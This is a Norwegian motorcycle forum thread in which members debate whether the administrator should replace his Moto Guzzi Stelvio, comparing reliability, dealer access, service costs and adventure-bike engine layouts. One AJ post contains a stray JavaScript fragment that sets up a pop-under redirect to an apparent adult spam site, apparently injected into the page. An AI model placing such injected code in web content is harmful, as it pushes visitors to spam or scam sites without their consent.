AJ Arena...

Din egen Forum-blogg! Om MC-livet ditt og annet du vil dele med andre.
Svar
Brukeravatar
L-NA
Innlegg: 813
Registrert: 02 okt 2012, 01:12
Motorsykkelen din: Moto Guzzi 1200 Stelvio NTX -2014

Re: AJ Arena... i vinterdvale...

Legg inn av L-NA »

Problemene jeg har hatt med min Stelvio er absolutt noe jeg kan leve med, og "mekke" litt selv ser jeg heller ikke på som noe problem. Men nå er det nå en gang slik at sykkel og bil som brukes mer eller mindre daglig, ønsker jeg ikke å "mekke" på. Dette både med bakgrunn i at jeg ønsker å bruke tiden til å kjøre, og ikke skru. Men også det at i dag har jeg økonomiske muligheter for å kjøpe så pass nytt, at garantier dekker det meste, eller at jeg kan benytte meg av fagpersonell dersom det er tilgjengelig. Har litt fantasier om å fått en gammel klessikker å restaurere litt på, men da snakker man forgasser og mekanikk som er forståelig. Jeg har tidligere gitt uttrykk for at jeg ikke ønsker for mye elektronikk, og det som du setter som minus ang manglende Cruisekontroll, motorprogram osv. for Stelvioen (i tråden for Egen MC--> pluss/minus) så ville jeg sett dette opp på Stelvio sin pluss side :-) men du sier jo også at det ikke er ett problem for deg.
I forbindelse med min jobb, har jeg stadig tekniske utfordringer med å bruke, finne ut av, og reparere tildels avanserte og høyteknologiske systemer og enheter. Dette skjer som oftest via gode support ordninger og dyktige medarbeidere, og man finner altids ut av ting. Men når jeg da kommer hjem, og sette meg på sykelen ønsker jeg rett og slett at ting skal virke :mk

....og gjør det ikke det så er det bare 25 min kjøring til nermeste Yamaha verksted, mens 3 timer incl, ferge til Guzzi verksted :sorry
Men hadde jeg hatt Hadeland MC like om hjørnet, så tror jeg Stelvio`n hadde vert eneste alternativ for min del :-)....( skal ikke si så mye om hvorfor, tror folk her inne begynner å bli lei av å høre om fakta de ikke forstår :-)å ..)

Brukeravatar
AJ
Administrator
Innlegg: 37963
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: AJ Arena... i vinterdvale...

Legg inn av AJ »

Videoer som denne gjør det vanskelig å gi slipp på Stelvio, særlig i forhold til det som kommer til uttrykk i siste halvdel av videoen :D

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

LordShaft
Innlegg: 6860
Registrert: 31 aug 2010, 00:17
Motorsykkelen din: KTM 1290 Super Adventure
Sted: Bergen
Kontakt:

Re: AJ Arena... i vinterdvale...

Legg inn av LordShaft »

Du er vel i en slik situasjon at det kan vel ikke skade så veldig å gjøre seg en helt ny erfaring på sykkel markedet? Prøv noe som kanskje ikke føles like safe.... I verste fall er det jo bare å selge. Er ikke så mye tap på en ny sykkel. Jeg blir å prøve noe helt annet når jeg for ny sykkel. Er jeg ikke fornøyd. Ja så selger jeg :knegg

Note 4

Brukeravatar
AJ
Administrator
Innlegg: 37963
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: AJ Arena... i vinterdvale...

Legg inn av AJ »

LordShaft skrev:Du er vel i en slik situasjon at det kan vel ikke skade så veldig å gjøre seg en helt ny erfaring på sykkel markedet? Prøv noe som kanskje ikke føles like safe.... I verste fall er det jo bare å selge. Er ikke så mye tap på en ny sykkel. Jeg blir å prøve noe helt annet når jeg for ny sykkel. Er jeg ikke fornøyd. Ja så selger jeg :knegg
En ganske så riktig analyse der, godeste Lordshaft :-).
Så vi får se hva som skjer... ;-)
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Brukeravatar
SuperMorten
Innlegg: 5292
Registrert: 03 mar 2012, 04:23
Motorsykkelen din: 2005 BMW R 1200 RT
Sted: Åsgårdstrand

Re: AJ Arena... i vinterdvale...

Legg inn av SuperMorten »

AJ skrev:
LordShaft skrev:Du er vel i en slik situasjon at det kan vel ikke skade så veldig å gjøre seg en helt ny erfaring på sykkel markedet? Prøv noe som kanskje ikke føles like safe.... I verste fall er det jo bare å selge. Er ikke så mye tap på en ny sykkel. Jeg blir å prøve noe helt annet når jeg for ny sykkel. Er jeg ikke fornøyd. Ja så selger jeg :knegg
En ganske så riktig analyse der, godeste Lordshaft :-).
Så vi får se hva som skjer... ;-)
Jeg har en følelse av at jeg vet hvilken retning AJ tenker.. Mulig at jeg tar feil, men tipper at det fortsatt blir Guzzi, men kanskje noe litt mer laid-back. F.eks California eller noe sånt.. :-k
[album]3061[/album] [album]3503[/album][album]4642[/album]

Never Ride Faster Than Your Angel Can Fly

Kjørelengde 2012 - 8500 km
Kjørelengde 2013 - 21449 km
Kjørelengde pr 20.6.2014 - 7259 km

LordShaft
Innlegg: 6860
Registrert: 31 aug 2010, 00:17
Motorsykkelen din: KTM 1290 Super Adventure
Sted: Bergen
Kontakt:

Re: AJ Arena... i vinterdvale...

Legg inn av LordShaft »

Uansett er han vel såpass voksen og "fornuftig" at han ikke gjør helt store bom kjøpet :thumleft
Blir uansett spennende å se hvilken retning han tar.

Note 4

Brukeravatar
Barbarozza
Innlegg: 560
Registrert: 21 apr 2011, 15:57
Motorsykkelen din: Kawasaki ZZR1400

Re: AJ Arena... Stelvio 2012 til salgs?

Legg inn av Barbarozza »

L-NA skrev:Med 4 cyl, og kjededrift, så faller nok kawan bort
Synes det er litt spennende jeg at noen prøver med 4 syl rekkemotorer i denne klassen.Her er det jo "nesten bare" bokser eller V motorer. Motoren har dessuten fått mye skryt siden den er kobla mot en glimrende girkasse.

Selvom jeg skjønner deg fordi det handler om hva man liker og "vil" ha

Med helautomatisk elektrisk kjedeoljesmører er kjededrift helt ok, det ble en annen verden og slippe å tenke på å smøre.

Jeg er spent på statsbudsjettet holder og håper ikke avgiftsletta blir bytta bort mot et eller annet til fordel krf og venstre.

Kunne vært morro å prøvd den kawaen i alle fall
Sist redigert av Barbarozza den 09 nov 2014, 16:15, redigert 2 ganger totalt.
Memento mori

Brukeravatar
ojda
Innlegg: 5632
Registrert: 19 sep 2010, 02:06
Motorsykkelen din: TRIUMPH TIGER EXPLORER 1200.
Sted: Oslo

Re: AJ Arena... Stelvio 2012 til salgs?

Legg inn av ojda »

Barbarozza skrev:
L-NA skrev:Med 4 cyl, og kjededrift, så faller nok kawan bort
Synes det er litt spennende jeg at noen prøver med rekkemotorer i denne klassen.Her er det jo enten bokser eller V motorer.
HALLO!!
Kjørt i 2014: 24323km. (v-68752) På`n igjen :-)
Kjørt i 2013:25179km. Kjørt til 21/9. Å dett var dett :-(
Kjørt i 2012:19250km D æ mer morro med ny sykkel ;-))
Kjørt i 2011:..9000km


Sendt fra min I-Pad. Nyladet med brunt skinnetui![/size]

Brukeravatar
Barbarozza
Innlegg: 560
Registrert: 21 apr 2011, 15:57
Motorsykkelen din: Kawasaki ZZR1400

Re: AJ Arena... Vinterdvale og sesong 2015 planlegging

Legg inn av Barbarozza »

Beklager , retter opp og fyller inn inn "nesten" :vs Sorry glemte trippelene...de er jo suverene...
Memento mori

Brukeravatar
Flanker
Innlegg: 1530
Registrert: 19 apr 2013, 09:02
Motorsykkelen din: Triumph Tiger Explorer
Sted: Berger, Svelvik
Kontakt:

Re: AJ Arena... Vinterdvale og sesong 2015 planlegging

Legg inn av Flanker »

... Super Tenere er en parallelltwin. Ser ikke helt den boxer/v-twin dominansen jeg. Etterhvert har alle mulige motorkonfigurasjoner kommet inn i denne klassen.

Brukeravatar
AJ
Administrator
Innlegg: 37963
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: AJ Arena... Vinterdvale og sesong 2015 planlegging

Legg inn av AJ »

Apropos V2 dominansen i adventuresegmentet...
Skrevet i full fart og sikkert ingen uttømmende liste, men tror jeg har fått med de fleste:

"Fullblods" adventure-modeller (sykler med 19/21" forhjul):
BMW GS800: to-sylindret rekke
BMW GS1200: to-sylindret boxer
KTM 1290 Super Adventure: to-sylindret V
KTM 1190 Adventure: to-sylindret V
Moto Guzzi Stelvio: to-sylindret V
Yamaha Ténéré 660: en-sylindret
Yamaha Super Ténéré: to-sylindret rekke
Honda Varadero: to-sylindret V
Honda Crosstourer: fire-sylindret V
Triumph Tiger 800: tre-sylindret rekke
Triumph Tiger Explorer: tre-sylindret rekke
Suzuki DL650 V-Strom: to-sylindret V
Suzuki DL1000 V-Strom: to-sylindret V
Aprilia Caponord 1200 Rally: to-sylindret V
Moto Morini Granpasso 1200: to-sylindret V (ikke tilgjengelig i Norge)
Benelli TRE 1130 Amazonas: tre-sylindret rekke (ikke tilgjengelig i Norge)

Alternative "halvblods" modeller (sykler med 17" forhjul):
Kawasaki Versys 650: to-sylindret rekke
Kawasaki Versys 1000: fire-sylindret rekke
Aprilia Caponord 1200: to-sylindret V
Ducati Multistrada 1200: to-sylindret V
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Brukeravatar
Barbarozza
Innlegg: 560
Registrert: 21 apr 2011, 15:57
Motorsykkelen din: Kawasaki ZZR1400

Re: AJ Arena... Vinterdvale og sesong 2015 planlegging

Legg inn av Barbarozza »

Flanker skrev:... Super Tenere er en parallelltwin. Ser ikke helt den boxer/v-twin dominansen jeg. Etterhvert har alle mulige motorkonfigurasjoner kommet inn i denne klassen.
Mye V i alle fall, men det er jo ikke poenget...men at Versys har en fin rekkefirer og går litt motstrøms var jo det jeg ville ha frem. Jeg kaster jo ikke vrak på det andre. Ei heller triplene som jeg glemte i farta

Det hele handler jo om at man velger det man har lyst på og som skal dekke ditt behov ut i fra dine kriterier og lommebok

Aller helst skulle jeg hatt råd til å ha minst 3 stykk i garasjen men det har jeg ikke.

Og det viktigste er jo at man har det morro uansett. Jeg kjører jo syklene mine tiltross for mangelfulle ADV egenskaper som akkurat det. Og jeg må innrømme at jeg skjønner ADV greia mer og mer siden kropp og sjel henger sammen
Memento mori

Brukeravatar
L-NA
Innlegg: 813
Registrert: 02 okt 2012, 01:12
Motorsykkelen din: Moto Guzzi 1200 Stelvio NTX -2014

Re: AJ Arena... Stelvio 2012 til salgs?

Legg inn av L-NA »

Barbarozza skrev:
L-NA skrev:Med 4 cyl, og kjededrift, så faller nok kawan bort
Synes det er litt spennende jeg at noen prøver med 4 syl rekkemotorer i denne klassen.Her er det jo "nesten bare" bokser eller V motorer. Motoren har dessuten fått mye skryt siden den er kobla mot en glimrende girkasse.

Selvom jeg skjønner deg fordi det handler om hva man liker og "vil" ha

Med helautomatisk elektrisk kjedeoljesmører er kjededrift helt ok, det ble en annen verden og slippe å tenke på å smøre.

Jeg er spent på statsbudsjettet holder og håper ikke avgiftsletta blir bytta bort mot et eller annet til fordel krf og venstre.

Kunne vært morro å prøvd den kawaen i alle fall
Denne Kawaen er helt sikkert en fantastisk sykkel, og for min del så ville den event. også ha noe som er totalt fraværende med min Stelvio, nemlig nærheten til service og forhandler :-)
Motoren kommer fra Z1000, men med ett annet "set-up" og blir blant motor anmeldere benevnt som en perle :-), er nok også en perle. Men jeg har allerede en R4 perle i garasjen, (GSX650F) og det med kjededrift (uten autom. smøring, og forøvrig ingen annen sammenligning med de to syklene). Kort sagt en "kjempe sykkel" :-). Men den mangler det jeg så gjerne vil ha, og Stelvio`n leverer i masse vis, nemlig Twin motoren sin karakteristikk, lyd, særegenhet, den karakteristiske vridningen i sykkelen når man står i ro, svake vibrasjonen, osv,osv. Dette er ting som mange andre vil "fnyse" av, men jeg liker :-)

Det som gjør meg litt skeptisk til å skifte merke, er litt dette som kanskje best kan forklares med min gamle TDM. En utrolig lett kjørt, driftsikker og god sykkel. Men den var og ble ett fremkomstmiddel :-| Mens største problemet med Stelvio`n er at jeg bare vil kjøre mer når jeg er komet frem :-) "bare må ha det" :redface ........

Gulost er ikke gulost.... ;-)

Brukeravatar
Barbarozza
Innlegg: 560
Registrert: 21 apr 2011, 15:57
Motorsykkelen din: Kawasaki ZZR1400

Re: AJ Arena... Vinterdvale og sesong 2015 planlegging

Legg inn av Barbarozza »

Det er neppe noe som er fantastisk. Men noe liker man bedre en annet. Og finner man sin greie så er det også det man blir vant med og ønsker seg mer av. Og man tenderer gjerne til å holde seg til bestemte merker osv uansett hva evt konkurentene kommer med. Vi er og forblir både forutintatte og ikke minst subjektive når det gjelder merker, typer, utstyr osv. Legg til at vi "alle" er rimelig forkjellige i huet,av personlighet, alder, interesser og yrker uttafor den "snevre" greia mc er, så skal det vel mye til at vi står der som et samla englekor og synger i lag.

Ikke så rart at man ikke blir enig, på mange måter bra for det finnes jo ikke verre en folk som går i takt, eller bare skriker ja uten å tørre å si nei og ta egne valg og protestere.

Og det er jo bra med "Guzzi" folk, de tar egne valg, og går litt uttafor den breie veien og egentlig har jeg alltid vært sånn sjøl...men når det gjelder motorsykler har jeg holdt meg til Japansk. Og vært fornøyd med det. Jeg skrur stort sett det meste sjæl, og handler godt brukt. Nyeste jeg har hatt er 5 år... Det som er fint med japanske sykler er deletilgang, masse knowhow på nettet og at det er godt skrudd og har greie løsninger. Det er for meg viktig. Også går det sjukt bra, i alle fall de greiene jeg har hatt de siste åra og det er holdbart samt at lommeboka lider ikke unødvendig heller

Det er også et moment for meg mht holdbarhet, skrekken min er å stå fast langt inni Romania eller i Tatrafjellene uten å kunne fikse sykkelen, da er det bra at den er holdbar. Jeg har aldri hatt et stopp på noen av eventyr rundene mine...bortsett fra i fjor da jeg greide å trykke ned stoppknappen uten at jeg skjønte det i stappene mørke på landsbygda i Ungarn...var litt nervøs et minutt til jeg fikk fram lommelykta og fikk lyst litt rundt og skjønte min egen tabbe.

Litt derfor er jeg engstelig for både KTM og evt Guzzi og også Caponorden..men jeg skjønner jo at dere er så fornøyde at jeg må revurdere den greia,De er like holdbare som mye annet...i alle fall så lenge de er relativt nye og velholdte mht ettersyn...Jeg skal i alle fall prøve dem...Det som faktisk teller mest i Kawas fordel er prisen...den ligger 50-60 tusen under alle andre..
Memento mori

Brukeravatar
AJ
Administrator
Innlegg: 37963
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: AJ Arena... Vinterdvale og sesong 2015 planlegging

Legg inn av AJ »

Barbarozza skrev: Litt derfor er jeg engstelig for både KTM og evt Guzzi og også Caponorden..men jeg skjønner jo at dere er så fornøyde at jeg må revurdere den greia,De er like holdbare som mye annet...i alle fall så lenge de er relativt nye og velholdte mht ettersyn...Jeg skal i alle fall prøve dem...Det som faktisk teller mest i Kawas fordel er prisen...den ligger 50-60 tusen under alle andre..
Jeg har hatt tre sykler siden jeg ble en "born-again biker" i 2006 :P :p.
Alle har vært årets modell, Yamaha TDM 900, 2006 modell med 0 på telleren, Triumph Tiger 1050, 2010 modell, demo-sykkelen med km.stand på drøye 4000 km og Stelvio 8V'en jeg har nå, 2012 modell, rett fra transportkassa til meg som første eier. Med unntak av TDM'en, som jeg kjørte tett innpå 60K med, har jeg tilbakelagt mellom 46 og 48K på de to andre.

Alle tre har hatt noen småfeil, men ikke verre enn at det er blitt fikset kjapt på garanti og rask deletilgang. Har ikke opplevd funksjonssvikt på langturer. Sånn sett stiller alle tre likt ved at de har vært solide sykler som overerasket positivt og opparbeidet stor grad av tillit hos meg.
Så min erfaring er både Triumph og Moto Guzzi er på nivå med de japanske syklene.
Tror ikke merker som KTM, BMW, Ducati og MV Agusta er noe dårlige.

Så byggkvaliteten er ikke tungen på vektskålen for min del.
Men siden jeg så langt har kjøpt nye sykler og at jeg sannsynligvis kommer til å gjøre det igjen, er det viktig med et verksted og god merkekunnskap så nær der jeg bor som mulig. Servicevennlighet på sykkelen og lave servicekostnader betyr også mye.
Og her har jeg en ubetinget Guzzi-fordel med dedikert Guzzi-mekaniker på autorisert verksted hos Guzzi-forhandler kun 15 minutters kjøring hjemmefra :prf .

Men det er klart at man (smug)kikker ;-) på andre alternativer også og har forhørt seg med mekanikeren om muligheten for service på den og den modellen til andre merker og hva prisen vil bli... Og svarene er egentlig rimelig forutsigbare.
Det langt mer plast å fjerne på alternative modeller jeg har kikket på enn hva tilfellet er med Stelvio. Selv enkle ting som å bytte plugger og gjøre ventiljusteringer krever atskillig mer arbeid.
Servicekostnadene vil trolig øke til mer enn det dobbelte, noe jeg merket stor forskjell på fra jeg gikk fra Triumph Tiger til Moto Guzzi Stelvio.

Så pr. idag med den erfaringen jeg har med Moto Guzzi er dette et merke som absolutt er med i vurderingen når ny sykkel skal anskaffes.
Og jeg tror jeg kan si at man kan være trygg på at deletilgang og garantisaker tas hånd om på en langt langt bedre måte i dag enn hva det ble gjort tidligere.
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Svar